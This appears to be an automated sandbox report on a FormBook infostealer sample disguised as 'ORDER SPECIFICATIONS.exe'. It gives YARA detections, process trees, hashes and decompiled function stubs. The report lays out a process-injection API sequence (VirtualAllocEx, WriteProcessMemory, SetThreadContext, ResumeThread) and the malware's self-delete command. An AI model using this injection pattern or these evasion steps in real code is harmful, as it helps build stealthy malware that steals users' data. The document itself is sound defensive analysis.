Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 5308 Parent PID: 6364

General

Start time:	08:57:20
Start date:	23/02/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe'
Imagebase:	0x2c0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5396 Parent PID: 5308

General

Start time:	08:57:20
Start date:	23/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: ORDER SPECIFICATIONS.exe PID: 6336 Parent PID: 5596 ORDER SPECIFICATIONS.exeCOMMON

Executed Functions

Function 0725D6FF, Relevance: 1.3, Strings: 1, Instructions: 84COMMON

Download Yara Rule

Strings

(, xrefs: 0725D6EC

Memory Dump Source

Source File: 00000000.00000002.261869820.0000000007250000.00000040.00000001.sdmp, Offset: 07250000, based on PE: false

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 7716d7f0660d1783d5bf8c07956f04ae7a6573912cc3c1633c06cc49e5416ef0
Instruction ID: ef9e21bac526244ec6cb16bc294be7475f84b259046fa3125653a474da70a34a
Opcode Fuzzy Hash: 7716d7f0660d1783d5bf8c07956f04ae7a6573912cc3c1633c06cc49e5416ef0
Instruction Fuzzy Hash: 133117B4E22229CFEB20DF64C889BD9BBB0FB0A314F0052D9D949A7251D7759E81CF01

Uniqueness

Uniqueness Score: -1.00%

Function 07250040, Relevance: .9, Instructions: 898COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.261869820.0000000007250000.00000040.00000001.sdmp, Offset: 07250000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92b6eb567ea567b33cea6c4595bb5e139edaf02933d4b9917ecef47cbcd2a7ad
Instruction ID: 9762b94ff50948b3ebb6dfc134e63b9f1db2b54a2773a8577bad5e427d0cb523
Opcode Fuzzy Hash: 92b6eb567ea567b33cea6c4595bb5e139edaf02933d4b9917ecef47cbcd2a7ad
Instruction Fuzzy Hash: 237260B0A1011A9FCB24CFB9C894AAEBBF2FF89304F158169E9059B355DB34DD41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0725F2E8, Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.261869820.0000000007250000.00000040.00000001.sdmp, Offset: 07250000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5666bbd5f932895a4e40edd2e8c1b78841fa2618db49ab37dc94102ffa773772
Instruction ID: c47a6443d58ec8df5bea851d58bf70dce5401b43604b33ea743dd7aabd6410c0
Opcode Fuzzy Hash: 5666bbd5f932895a4e40edd2e8c1b78841fa2618db49ab37dc94102ffa773772
Instruction Fuzzy Hash: D8C126B1A141458FCB04DF69C554AEDB7F2AF8D310F1AC1AAE915AB361DB30EC45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 07252FC0, Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.261869820.0000000007250000.00000040.00000001.sdmp, Offset: 07250000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3fa2e83b03b57520b757379933ef04d948d1cb5c330d25a6d09229041b8677a
Instruction ID: 081fa6a07d4718104b9fc6f3c19da28f3d7c10554713d28ce4c222fa21b09f20
Opcode Fuzzy Hash: e3fa2e83b03b57520b757379933ef04d948d1cb5c330d25a6d09229041b8677a
Instruction Fuzzy Hash: 2C61AFB0D15249CFC744EFB5E84269E7BF3EB8A304F00C439D90A9B269DB755A468F81

Uniqueness

Uniqueness Score: -1.00%

Function 07252FD0, Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.261869820.0000000007250000.00000040.00000001.sdmp, Offset: 07250000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fa970f652b4e8cc805005e9835906fa151487cbf71886c20131994981ba6b16
Instruction ID: 21deeb0252ea12a5cf57fdc932731e22e2cea10cad7d48e1f81478f454d8c12a
Opcode Fuzzy Hash: 6fa970f652b4e8cc805005e9835906fa151487cbf71886c20131994981ba6b16
Instruction Fuzzy Hash: 7D518CB0E15249CFC744EFB9E84269E7BF3EB8A304F01C429D50A9B369DB7559068B81

Uniqueness

Uniqueness Score: -1.00%

Function 0725B028, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0725B25E

Strings

`-?, xrefs: 0725B092
`-?, xrefs: 0725B063

Memory Dump Source

Source File: 00000000.00000002.261869820.0000000007250000.00000040.00000001.sdmp, Offset: 07250000, based on PE: false

Similarity

API ID: CreateProcess
String ID: `-?$`-?
API String ID: 963392458-2136092351
Opcode ID: 8e217a0a70acec5b2e944b2168e4126dbb14e283bf09e6e604877a039a4bf2e8
Instruction ID: 791005ce248cf13c53a1632cbdf186599fb2610690c2fa125f103bad0e005709
Opcode Fuzzy Hash: 8e217a0a70acec5b2e944b2168e4126dbb14e283bf09e6e604877a039a4bf2e8
Instruction Fuzzy Hash: 3A9159B1D1425ADFDB20CFA8C881BEEBBB2FF48314F058569D819A7240DB749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 05ADA210, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 05ADA2AF

Strings

`-?, xrefs: 05ADA23D

Memory Dump Source

Source File: 00000000.00000002.257021946.0000000005AD0000.00000040.00000001.sdmp, Offset: 05AD0000, based on PE: false

Similarity

API ID: DrawText
String ID: `-?
API String ID: 2175133113-567961056
Opcode ID: 9c311c3a14fd57fd5cda215320ca6b5f3bf97fc4c9b841e868bf5729ea572327
Instruction ID: eec79b758fe3c86cbeeb5b44be85eaa71cc4d4926125bec9bb6346c4f31b396b
Opcode Fuzzy Hash: 9c311c3a14fd57fd5cda215320ca6b5f3bf97fc4c9b841e868bf5729ea572327
Instruction Fuzzy Hash: 0631E3B5D052099FCB10DF9AD884AEEFBF4FB58324F14842AE915A7310D775AA44CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0725AD9B, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0725AE30

Strings

`-?, xrefs: 0725ADBF

Memory Dump Source

Source File: 00000000.00000002.261869820.0000000007250000.00000040.00000001.sdmp, Offset: 07250000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID: `-?
API String ID: 3559483778-567961056
Opcode ID: 52d647f059d329b3f334e6d527af1e318e0cd6c46d47bb6280497e99be14933c
Instruction ID: 8560f1c863d236bed1eae9acf13d36bd5d9aa4fba14dcc0221db05241006f640
Opcode Fuzzy Hash: 52d647f059d329b3f334e6d527af1e318e0cd6c46d47bb6280497e99be14933c
Instruction Fuzzy Hash: AB2146B19003499FCF10CFA9C8857EEBBF5FF48314F00882AE958A7240D778A955CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0725ADA0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0725AE30

Strings

`-?, xrefs: 0725ADBF

Memory Dump Source

Source File: 00000000.00000002.261869820.0000000007250000.00000040.00000001.sdmp, Offset: 07250000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID: `-?
API String ID: 3559483778-567961056
Opcode ID: 000e8bdfe8957bb8598e4a6f700ba7046a5fde0dfae53316a016ca373ab52d27
Instruction ID: 151ba8e2c6f8b674fa6b8840181f37e2137fb478917f7e99f4fd26bb28f98b6e
Opcode Fuzzy Hash: 000e8bdfe8957bb8598e4a6f700ba7046a5fde0dfae53316a016ca373ab52d27
Instruction Fuzzy Hash: 872139B19003599FCF10DFA9C8857EEBBF5FF48314F00842AE959A7240C778A954CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 05ADA218, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 05ADA2AF

Strings

`-?, xrefs: 05ADA23D

Memory Dump Source

Source File: 00000000.00000002.257021946.0000000005AD0000.00000040.00000001.sdmp, Offset: 05AD0000, based on PE: false

Similarity

API ID: DrawText
String ID: `-?
API String ID: 2175133113-567961056
Opcode ID: 00eea94184b5adc620ae2c6004697c0f5fdfafabf69fdec5389bd5163bb9a0d2
Instruction ID: ce7b9bf6650ca6723b60c7198ca430e38ed4f54b7cbc6929961e755cbb1755ed
Opcode Fuzzy Hash: 00eea94184b5adc620ae2c6004697c0f5fdfafabf69fdec5389bd5163bb9a0d2
Instruction Fuzzy Hash: 4121D2B5D052099FCB10DF9AD884AEEFBF4FB58324F14842AE919A7310D775A944CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0725AC00, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 0725AC86

Strings

`-?, xrefs: 0725AC24

Memory Dump Source

Source File: 00000000.00000002.261869820.0000000007250000.00000040.00000001.sdmp, Offset: 07250000, based on PE: false

Similarity

API ID: ContextThread
String ID: `-?
API String ID: 1591575202-567961056
Opcode ID: cc625f1ed6e325de54e767b8f0c7b68be526f3b07b035be73a82100d43462bef
Instruction ID: 13cb03f54f7d3b444ef679ee6dbf9207a659f1294f60d64dd3fdcd71c33a03bd
Opcode Fuzzy Hash: cc625f1ed6e325de54e767b8f0c7b68be526f3b07b035be73a82100d43462bef
Instruction Fuzzy Hash: 2B2169B19042099FCB10CFA9C4857EEBFF4AF48224F14842ED959A7241DB78A945CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0725AE88, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0725AF10

Strings

`-?, xrefs: 0725AEAF

Memory Dump Source

Source File: 00000000.00000002.261869820.0000000007250000.00000040.00000001.sdmp, Offset: 07250000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID: `-?
API String ID: 1726664587-567961056
Opcode ID: 5b953b703e00f5ac0c35e203031d541d5d9414cc22b2c12bf7105d34e6589be1
Instruction ID: 8bc2ec8b62e7ada29749bfa5ec1248e6b974ef7d83af7a79f34957d1f568b88f
Opcode Fuzzy Hash: 5b953b703e00f5ac0c35e203031d541d5d9414cc22b2c12bf7105d34e6589be1
Instruction Fuzzy Hash: 4C2136B19142499FCF10CFAAC8857EEBBF5FF48324F50842EE958A7240D7389944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0725AE90, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0725AF10

Strings

`-?, xrefs: 0725AEAF

Memory Dump Source

Source File: 00000000.00000002.261869820.0000000007250000.00000040.00000001.sdmp, Offset: 07250000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID: `-?
API String ID: 1726664587-567961056
Opcode ID: 952930440e30611ee6a607c73ccd1ff88f52e7cbde40f1ebcad5316f4127c983
Instruction ID: dadbcd86fda775d7c69a53723629ebbf85b3aebdbad519989cf48519b52bcb14
Opcode Fuzzy Hash: 952930440e30611ee6a607c73ccd1ff88f52e7cbde40f1ebcad5316f4127c983
Instruction Fuzzy Hash: F92128B19042599FCB10DFA9C8846EEBBF5FF48314F50842AE919A7240C7789944DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0725AC08, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,00000000), ref: 0725AC86

Strings

`-?, xrefs: 0725AC24

Memory Dump Source

Source File: 00000000.00000002.261869820.0000000007250000.00000040.00000001.sdmp, Offset: 07250000, based on PE: false

Similarity

API ID: ContextThread
String ID: `-?
API String ID: 1591575202-567961056
Opcode ID: 32602ac1c8114eb1831d333ac5ca2788171a26829647d90f4bd650ce1d75a66a
Instruction ID: 98d8632f6d2cbcba22ba7708a85059d00f561670188a5fe23a5b27ff9e178a71
Opcode Fuzzy Hash: 32602ac1c8114eb1831d333ac5ca2788171a26829647d90f4bd650ce1d75a66a
Instruction Fuzzy Hash: A42138B19043099FCB10DFAAC4857EEBBF4EF48324F14842AD919A7340CB78A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0725ACD8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0725AD4E

Strings

`-?, xrefs: 0725ACF7

Memory Dump Source

Source File: 00000000.00000002.261869820.0000000007250000.00000040.00000001.sdmp, Offset: 07250000, based on PE: false

Similarity

API ID: AllocVirtual
String ID: `-?
API String ID: 4275171209-567961056
Opcode ID: 6ef6bcc4f60e1e7931e2ff213261a8d2e2016c88fea9ebe34c71a3edc1aa2318
Instruction ID: 0f3a5365d8142244510678485343fd3d680098630ae9998d3280cf0bbc049ab0
Opcode Fuzzy Hash: 6ef6bcc4f60e1e7931e2ff213261a8d2e2016c88fea9ebe34c71a3edc1aa2318
Instruction Fuzzy Hash: 46216AB19042499FCB10DFA9C8446EFBFF5EF48324F14881AD915A7610C7759944CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0725ACE0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0725AD4E

Strings

`-?, xrefs: 0725ACF7

Memory Dump Source

Source File: 00000000.00000002.261869820.0000000007250000.00000040.00000001.sdmp, Offset: 07250000, based on PE: false

Similarity

API ID: AllocVirtual
String ID: `-?
API String ID: 4275171209-567961056
Opcode ID: 8b184b2edc7575e3bfb485a41ada7983c9d4f5cfb59c5d41e7338bbef46c1b9d
Instruction ID: 26f69e5fd2e95442bf72cf4a91c904dae684f0c9e14384ca2945395836f3214b
Opcode Fuzzy Hash: 8b184b2edc7575e3bfb485a41ada7983c9d4f5cfb59c5d41e7338bbef46c1b9d
Instruction Fuzzy Hash: 991126B19042499FCB10DFA9C8446EFBBF5AB48324F148819E915A7250C775A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0725DFE0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0725E045

Strings

`-?, xrefs: 0725E002

Memory Dump Source

Source File: 00000000.00000002.261869820.0000000007250000.00000040.00000001.sdmp, Offset: 07250000, based on PE: false

Similarity

API ID: MessagePost
String ID: `-?
API String ID: 410705778-567961056
Opcode ID: 4f79de0ea374cbb1be7df61e3ba06010af2dd323f4c40d102eca8c8d2232b784
Instruction ID: 73e69b7b501cda6d014a7f6a8c1e51441d7d89727760871001e4edaff1ebb5c2
Opcode Fuzzy Hash: 4f79de0ea374cbb1be7df61e3ba06010af2dd323f4c40d102eca8c8d2232b784
Instruction Fuzzy Hash: 6111F5B58003499FCB20CF99D485BEFBFF8EB48324F14841AE954A7600C374A984CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0725AB58, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0725ABBA

Strings

`-?, xrefs: 0725AB6F

Memory Dump Source

Source File: 00000000.00000002.261869820.0000000007250000.00000040.00000001.sdmp, Offset: 07250000, based on PE: false

Similarity

API ID: ResumeThread
String ID: `-?
API String ID: 947044025-567961056
Opcode ID: ee8d3432a2e42902b280083b774fd8d3de92d71ee812b38ec3e80f8867980422
Instruction ID: 0749700c4b4e29b52c2650afdab33e75d536cad176b86b1eac57969c22a8b892
Opcode Fuzzy Hash: ee8d3432a2e42902b280083b774fd8d3de92d71ee812b38ec3e80f8867980422
Instruction Fuzzy Hash: 07113AB19042498FCB10DFAAC4447EFFBF5AB88324F14881DD515A7240CB74A944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 07252458, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0725E045

Strings

`-?, xrefs: 0725E002

Memory Dump Source

Source File: 00000000.00000002.261869820.0000000007250000.00000040.00000001.sdmp, Offset: 07250000, based on PE: false

Similarity

API ID: MessagePost
String ID: `-?
API String ID: 410705778-567961056
Opcode ID: d4b59576e6448ce495368e51f52300954472dde8ee27531d54ead30dd574875e
Instruction ID: 1da191a26c971edf0b7be6c66b3aa41c5b603279a6c9aca1d6f66930106727d6
Opcode Fuzzy Hash: d4b59576e6448ce495368e51f52300954472dde8ee27531d54ead30dd574875e
Instruction Fuzzy Hash: 4F1106B5904349DFCB10DF99C484BEFBBF8EB48324F14841AE955A7200C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 07250D83, Relevance: .9, Instructions: 917COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.261869820.0000000007250000.00000040.00000001.sdmp, Offset: 07250000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d591e3f209c3d5fa247c85dddcdc20a66be48b628012b43d0d70d33de92507a
Instruction ID: 9d36eed7f6f5372fe6690b4b396455e3e69b379b691e8f03ee068a4321edbc81
Opcode Fuzzy Hash: 7d591e3f209c3d5fa247c85dddcdc20a66be48b628012b43d0d70d33de92507a
Instruction Fuzzy Hash: FC825FB0A2020ADFDB24CF68C584AAEBBF2FF49314F158559E805DB2A1D731ED91CB51

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ORDER SPECIFICATIONS.exe PID: 6552 Parent PID: 6336 ORDER SPECIFICATIONS.exeCOMMON

Executed Functions

Function 00418260, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418260(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DB0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d42
				_t12 =  &_a8; // 0x413d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}

0x00418263
0x0041826f
0x00418277
0x00418282
0x0041829d
0x004182a5
0x004182a9

APIs

NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5

Strings

B=A, xrefs: 00418282, 00418290
B=A, xrefs: 0041829D, 004182A4

Memory Dump Source

Source File: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: B=A$B=A
API String ID: 2738559852-2767357659
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 36fb0ef1660234b95adbc5e615de389476f61a426637268b67c73261640a8fd9
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 2AF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82

Memory Dump Source

Source File: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: 046ff59bb8e44ad8641c0e43070f5aeaf3db9792b4ffc4f87dfb9ba9f6fb7e9c
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: D70112B5D4010DB7DF10EAE5DC42FDEB378AB54318F1041A5E908A7281F635EB54C795

Uniqueness

Uniqueness Score: -1.00%

Function 004181AB, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD

Memory Dump Source

Source File: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: afb65e48681c71d4644a811e388a9e16032f241481beaf82c92c0a1056cb2203
Instruction ID: 2daec0304abf6173068a3af9d2d84d543add0665aa477c4bd303616a3ddfc632
Opcode Fuzzy Hash: afb65e48681c71d4644a811e388a9e16032f241481beaf82c92c0a1056cb2203
Instruction Fuzzy Hash: A501A4B2204108AFCB48CF89DC85DEB77A9AF8C354F158249FA1D97250D630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004181B0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD

Memory Dump Source

Source File: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 1505d2c2fac7169f29cf6ab97caa2a59105c471fc85729d0552dd22f4c6ed161
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: D7F0B6B2200208ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041838A, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9

Memory Dump Source

Source File: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: de23a0a4219be60871f9cfd12fa7416125d533e3a1ca55fd95d9f6a72c30d04a
Instruction ID: 62f07022574a5184fbf9b179fc26fa4e39932dc19eb111fcbd50c171343f9ba9
Opcode Fuzzy Hash: de23a0a4219be60871f9cfd12fa7416125d533e3a1ca55fd95d9f6a72c30d04a
Instruction Fuzzy Hash: 8FF08CB2600208BFCB14CF99CC80EEB77A9AF88340F10824DFE0D97281C630E810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00418390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9

Memory Dump Source

Source File: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 004182E0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305

Memory Dump Source

Source File: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 2c2b34aedc846ab3ae484734a1171ee081eb0df99b6426d3cac892bcac86a451
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 7CD012752003146BD710EF99DC45ED7775CEF44750F154459BA185B242C930F90086E4

Uniqueness

Uniqueness Score: -1.00%

Function 01509910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0150991A

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 81b41965087751f114907e5b7f3b88c46464093f6abfe4926360a817884ec29b
Instruction ID: 2b935e3e143b1339bb5ae32a8fa20ddb387d5a1f6f264558562a11bc0939513f
Opcode Fuzzy Hash: 81b41965087751f114907e5b7f3b88c46464093f6abfe4926360a817884ec29b
Instruction Fuzzy Hash: EC9002B124101402E141719984087460455B7D0345F51C811A5054954EC6998DD576A5

Uniqueness

Uniqueness Score: -1.00%

Function 015099A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 015099AA

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e0751d3530ab54f6c7b3c4435f0ff16b5cb8d40f315bf06acd88b3f9d86e5530
Instruction ID: e258e2eccca89680b03a9113576fed84222022d6183f785f03479c6ca56dc4de
Opcode Fuzzy Hash: e0751d3530ab54f6c7b3c4435f0ff16b5cb8d40f315bf06acd88b3f9d86e5530
Instruction Fuzzy Hash: C09002A138101442E10161998418B060455F7E1345F51C815E1054954DC659CC927166

Uniqueness

Uniqueness Score: -1.00%

Function 01509840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0150984A

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 19ed027d810f8afcd1e11302291bcabcefbd4c557cc02b83ad2997a021822ace
